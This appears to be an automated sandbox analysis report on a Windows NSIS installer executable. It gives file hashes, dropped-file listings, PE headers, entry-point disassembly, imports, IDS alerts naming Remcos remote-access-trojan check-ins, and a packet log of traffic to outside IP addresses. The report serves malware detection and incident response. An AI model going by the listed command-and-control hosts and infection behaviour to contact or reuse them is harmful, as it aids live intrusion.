                                                                                    Preview:........,...................X...d.......d...................................................................................................................................................................................................................................................G...Y...........q...j...............................................................................................................................b.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):12288
                                                                                    Entropy (8bit):5.805604762622714
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                                                                                    MD5:4ADD245D4BA34B04F213409BFE504C07
                                                                                    SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                                                                                    SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
                                                                                    SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                                    • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                                    • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                                    • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                                    • Filename: ZAMOWIEN.BAT.exe, Detection: malicious, Browse
                                                                                    • Filename: , Detection: malicious, Browse
                                                                                    • Filename: RFQ_BDS636011.exe, Detection: malicious, Browse
                                                                                    • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                    • Filename: CERTIFICADO TITULARIDAD.exe, Detection: malicious, Browse
                                                                                    • Filename: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):2
                                                                                    Entropy (8bit):1.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Qn:Qn
                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                    Malicious:false
                                                                                    Preview:..
                                                                                    Process:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8589934592.000000
                                                                                    Category:dropped
                                                                                    Size (bytes):267655
                                                                                    Entropy (8bit):1.2559804952290619
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:HbUhrUe+zlum+LaFrAX40edupFSsZVfeTkVhbbCGx6+ZOoJrrSVlRM9k8rZgQWze:ICFg/VP97pb14sZg
                                                                                    MD5:F6A4342C9271CFFEF29695EEA330941E
                                                                                    SHA1:291ABCFA507BA730832511E5F47EAA2CB4DFABBD
                                                                                    SHA-256:605B31C886C5989625152D1CD58BCACF2827DE36CC67B5D94D6B425955CEDBA6
                                                                                    SHA-512:D839DD8E3D74B7500F32318403BEAC3BA2DA83C48EF21555E78D368AA0404AC750DB1DD7EB8A7196DA32FBE3D880B66ED3166A39F17D8D0D13C9C4B19435530C
                                                                                    Malicious:false
                                                                                    Preview:...........T.........'......'....A........s.................@.....................................................................N......M...........^................................t............Q.......R...r.........................................................6..................Q...I........<....d......................................................................................B.....p............/.........................................."...b..@...................Q...........!.................................f............................`.................d.................................L.........f...o....................................................................................s...................i.....................S.b..A...............................................................U..o................................................................../...............................................................................................`..................
                                                                                    Process:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):114454
                                                                                    Entropy (8bit):1.2519787240577294
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:RRDt23AKhN87PfNufvVxTfdx5U5Flf6VAETw:YEevVx2h
                                                                                    MD5:F85E20AA1A28EEFFC89F744F6B6B67B3
                                                                                    SHA1:B61AEF131017C5605647983CE2D55769914BB104
                                                                                    SHA-256:C388ED22B7E44C0C3FDD6D064DD070DCA64CEA1E83D6151566641E7438C346ED
                                                                                    SHA-512:EA89503F496B30DA5EAA74BB479007BB6B93463B775F16810A4391E79389A219398AC81DCCDD79C3F60E85DF77AA985E405BDF7B477C8F3217ECC3B7460BEE6A
                                                                                    Malicious:false
                                                                                    Preview:...............................m.......................5............}.......t......^..................................................)..........................................;......B.......................................................................*....................3.......s.......................+.+...@=.......O..........................G...................M...........g...................#.........................................................................................................v......................e........n......,...................b.................................e.................Y.......=..........................................................a........j.../.........#..........................`..................................>........\..................................... ..................................................g..R.........................................................................g...............................N....................
                                                                                    Process:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):310550
                                                                                    Entropy (8bit):1.2527719188567612
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:CfvXvtPDO00Rz1DXs2sASdJwvyfnpZkL:klDO0MDRS9k
                                                                                    MD5:72FA348549D0BD9CE66E5F3EBA54DF3A
                                                                                    SHA1:D5B4797D07374226CD8173964DF8753F4ABB9E6E
                                                                                    SHA-256:7F24A44B47D2C036AACE03D4F5EBEA053CED6ED06CE01ED70E6FD8AEE8211CC9
                                                                                    SHA-512:D375FC28BBA68A52E4C2CB97A9ADA416D38F29B21004F1853DC14ACF28CDE2A802D51FD66901D993DAA58E50D8C87FD2A8827482633B0B9874FF64F8442492B1
                                                                                    Malicious:false
                                                                                    Preview:...e......J.........................................................................................................................................J........K...............................L...........................v.............................................................................%..:...................F.................................................................|...1.....A..................................1........d...................J..X..........................x..............x..."..........................`.........................................................[...................t.......................2..............................................................................t....................................................$...\...............!..........................|....................................r.............................W.............................................X.....................................................q.................
                                                                                    Process:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):83152
                                                                                    Entropy (8bit):4.590487128538397
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:mPpv9Hyk6GJxFF88oQTFd5xzmxgxAVH3r2gnnAOpuIg:mPpvdys0xQT/5m9SJEuIg
                                                                                    MD5:3B9A97DDA581FFCEB29B192F228D66DF
                                                                                    SHA1:A11D7ADCC7A283B75D217A27724324F53FB91540
                                                                                    SHA-256:F783B047374C53913141CAFDE79B94B7C0D3AEA69AE86EA4417D7C8EB7798529
                                                                                    SHA-512:13BD775B3FF31F2127C28D26942DE8235EFE96AF4E2A921DBD82C813B53167E7B3E331A7F45178A77E65C2EF9CDA0D25DEAD6C775FFEC0F0E8CAD45DCB0DDF7E
                                                                                    Malicious:false
                                                                                    Preview:..UU...........K....]]]]]...FF...6.........g....++.....D.....;.s.:..//..d..O....AAA....=._...........;;;..........W............................888.......L.....CCC...............66..../..........vvv.........q..................C....<<<..................e..............-......qq..*.D.......00...%....""".======.#........................................'.........C.........UU..............L...^.......+............222.333.kkk.MMMMMMMMMM....................Q............ll.........hh.........ss.......>.........E......%%%..........................MM.................................... ...........:...........................Y.................[................................ ...........55555......<<<<.?.........//....D.Y.$$.............I..%.....................-..zz..sss.......=.........333.................KK.........JJ...................R...'.....................X..9....XXXXXXXXX.Z.......S...S......I...77.............eeeee....w...................................................v..gg.....222.
                                                                                    Process:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):295959
                                                                                    Entropy (8bit):7.608537202687179
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:WH4o5aBQ0lz5DJimagdvhT7lmfp8Fpzkc1PlKQl4ZPIxo4+V6GVS2paf:WYo2Z5DAmaghhFm2YqtP4lIxgBVLpaf
                                                                                    MD5:5B2D5C7C1482936796C2699166B34424
                                                                                    SHA1:493E890B6548A54DDADB5D450797BBE68429502C
                                                                                    SHA-256:A7C9A3BE29FACF27782B90B0E6EE7D6B645CD7F827C6475BFD19A6480D0890EA
                                                                                    SHA-512:3983BFC12B10AB6C26BF3D070CAA9960C6F6DF07D48BB27318C984BD2CA56CF310050E0ED40A8E11E284B70413B01773DF7F5178216953AF5A5E47E4F7A89368
                                                                                    Malicious:false
                                                                                    Preview:.#............H.......................xxx.$............@..W.......dd..............................dddd...MM.........qq...........u.....PP...............A.............!!!.```.....BBBBBBB.999..........+......................X.n.....11.g........W.........y.....fff....-.........,..<<<....s........EEE........................AAA...w.CCC.......j.......^.!.w...ZZZZZZ....................................._.....___.............@@..........................ww...uuuuuu.C..............f...22..........E.:...........4..-......e.........ww...<<<<. ...........................B..f.....TT.7777..............www.....T.cc..xx.`....f..33...I...<<<<....tttt........Q...J.......................000..&.TT......==......A........jjj..M.ss........BBB.....DD.~~.........LLLLL.C.,..........r..........EE......................;........gg.....????..M.*.............==.....b..............J................................cc.............Y.U....E.....yyy.. ....AA..C......=....qqqqqq..............K.llll......bbb...@.?..........
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.712228071105721
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:LrBF2Z930N.exe
                                                                                    File size:550'217 bytes
                                                                                    MD5:25eec63edf7c0eb8628a89712b5cb363
                                                                                    SHA1:4e8d586a950492c30147b7d56bcfad49cd577966
                                                                                    SHA256:e075807417590255de4d395fa3dfbc336e88c96bbab8afca1d5e5d5abbac0237
                                                                                    SHA512:086feb119e2a02f2fd7afc45c422f9b472f049eb2e79f83769f25254d88a84086275d2cff1e891d360ea57978292cd0caf958e4000cd659ac532165e1f881dfb
                                                                                    SSDEEP:6144:UnPdudwDCVOCg2G4A+uxXCpzna3MSzy99s5sbro5kd+B4hJ1QQsSGuhkrpzOUlec:UnPdMg2H8SpzaThHy7mzOUlvnVMs3e+
                                                                                    TLSH:D9C4F1E4E210C1A7E25F5D38DAB169F11D80BC38D1E1087B43507EA9F4B2A2599EF91F
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...g..d.................h...".....
                                                                                    Icon Hash:4571753721719a8d
                                                                                    Entrypoint:0x403645
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x64A0DC67 [Sun Jul 2 02:09:43 2023 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                                                    Instruction
                                                                                    sub esp, 000003F8h
                                                                                    push ebp
                                                                                    push esi
                                                                                    push edi
                                                                                    push 00000020h
                                                                                    pop edi
                                                                                    xor ebp, ebp
                                                                                    push 00008001h
                                                                                    mov dword ptr [esp+20h], ebp
                                                                                    mov dword ptr [esp+18h], 0040A230h
                                                                                    mov dword ptr [esp+14h], ebp
                                                                                    call dword ptr [004080A0h]
                                                                                    mov esi, dword ptr [004080A4h]
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push eax
                                                                                    mov dword ptr [esp+4Ch], ebp
                                                                                    mov dword ptr [esp+0000014Ch], ebp
                                                                                    mov dword ptr [esp+00000150h], ebp
                                                                                    mov dword ptr [esp+38h], 0000011Ch
                                                                                    call esi
                                                                                    test eax, eax
                                                                                    jne 00007F30D0DF46AAh
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    mov dword ptr [esp+34h], 00000114h
                                                                                    push eax
                                                                                    call esi
                                                                                    mov ax, word ptr [esp+48h]
                                                                                    mov ecx, dword ptr [esp+62h]
                                                                                    sub ax, 00000053h
                                                                                    add ecx, FFFFFFD0h
                                                                                    neg ax
                                                                                    sbb eax, eax
                                                                                    mov byte ptr [esp+0000014Eh], 00000004h
                                                                                    not eax
                                                                                    and eax, ecx
                                                                                    mov word ptr [esp+00000148h], ax
                                                                                    cmp dword ptr [esp+38h], 0Ah
                                                                                    jnc 00007F30D0DF4678h
                                                                                    and word ptr [esp+42h], 0000h
                                                                                    mov eax, dword ptr [esp+40h]
                                                                                    movzx ecx, byte ptr [esp+3Ch]
                                                                                    mov dword ptr [00429B18h], eax
                                                                                    xor eax, eax
                                                                                    mov ah, byte ptr [esp+38h]
                                                                                    movzx eax, ax
                                                                                    or eax, ecx
                                                                                    xor ecx, ecx
                                                                                    mov ch, byte ptr [esp+00000148h]
                                                                                    movzx ecx, cx
                                                                                    shl eax, 10h
                                                                                    or eax, ecx
                                                                                    movzx ecx, byte ptr [esp+0000004Eh]
                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x18858.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x66b70x6800e65344ac983813901119e185754ec24eFalse0.6607196514423077data6.4378696011937135IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0xa0000x1fb780x600caa377d001cfc3215a3edff6d7702132False0.5091145833333334data4.126209888385862IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .ndata0x2a0000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x4a0000x188580x18a0073bbe3fdd1585fbd610b24874590b455False0.22416322969543148data5.2980000367452575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0x4a4180x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.14908908079971608
                                                                                    RT_ICON0x5ac400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.27520746887966807
                                                                                    RT_ICON0x5d1e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.3553001876172608
                                                                                    RT_ICON0x5e2900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.48667377398720685
                                                                                    RT_ICON0x5f1380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.43934426229508194
                                                                                    RT_ICON0x5fac00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.569043321299639
                                                                                    RT_ICON0x603680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672EnglishUnited States0.5552995391705069
                                                                                    RT_ICON0x60a300x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.18841463414634146
                                                                                    RT_ICON0x610980x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4869942196531792
                                                                                    RT_ICON0x616000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.598404255319149
                                                                                    RT_ICON0x61a680x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.26344086021505375
                                                                                    RT_ICON0x61d500x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 384EnglishUnited States0.3094262295081967
                                                                                    RT_ICON0x61f380x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.42905405405405406
                                                                                    RT_DIALOG0x620600x100dataEnglishUnited States0.5234375
                                                                                    RT_DIALOG0x621600x11cdataEnglishUnited States0.6056338028169014
                                                                                    RT_DIALOG0x622800x60dataEnglishUnited States0.7291666666666666
                                                                                    RT_GROUP_ICON0x622e00xbcdataEnglishUnited States0.601063829787234
                                                                                    RT_VERSION0x623a00x174dataEnglishUnited States0.5860215053763441
                                                                                    RT_MANIFEST0x625180x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                    DLLImport
                                                                                    ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                    SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                    ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                    COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                    USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                                    GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                                    KERNEL32.dllRemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW
                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States
                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2025-01-14T15:32:07.043325+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.561631109.99.162.14443TCP
                                                                                    2025-01-14T15:32:12.746195+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.56163243.226.229.2093980TCP
                                                                                    2025-01-14T15:32:14.153429+01002032777ET MALWARE Remcos 3.x Unencrypted Server Response143.226.229.2093980192.168.2.561632TCP
                                                                                    2025-01-14T15:32:15.422525+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.561634178.237.33.5080TCP
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 14, 2025 15:30:12.246704102 CET6144853192.168.2.5162.159.36.2
                                                                                    Jan 14, 2025 15:30:12.251511097 CET5361448162.159.36.2192.168.2.5
                                                                                    Jan 14, 2025 15:30:12.251606941 CET6144853192.168.2.5162.159.36.2
                                                                                    Jan 14, 2025 15:30:12.256432056 CET5361448162.159.36.2192.168.2.5
                                                                                    Jan 14, 2025 15:30:12.696132898 CET6144853192.168.2.5162.159.36.2
                                                                                    Jan 14, 2025 15:30:12.701751947 CET5361448162.159.36.2192.168.2.5
                                                                                    Jan 14, 2025 15:30:12.701807976 CET6144853192.168.2.5162.159.36.2
                                                                                    Jan 14, 2025 15:32:05.825195074 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:05.825241089 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:05.825346947 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:05.836488008 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:05.836514950 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:06.759876013 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:06.760009050 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:06.809310913 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:06.809340954 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:06.809657097 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:06.809725046 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:06.812422991 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:06.859325886 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.043334961 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.043359041 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.043473959 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.043498039 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.043741941 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.164228916 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.164431095 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.164464951 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.164524078 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.166486979 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.166529894 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.166580915 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.166593075 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.166651011 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.289329052 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.289468050 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.289690971 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.289757013 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.290646076 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.290712118 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.290815115 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.290874958 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.291467905 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.291512966 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.291527033 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.291547060 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.291563034 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.291567087 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.291578054 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.291585922 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.291613102 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.291635990 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.406658888 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.406738997 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.406919956 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.406999111 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.407361031 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.407413960 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.407876968 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.407943964 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.408245087 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.408298969 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.408521891 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.408584118 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.409310102 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.409363031 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.409425974 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.409476995 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.493448019 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.493500948 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.493530989 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.493560076 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.493580103 CET61631443192.168.2.5109.99.162.14
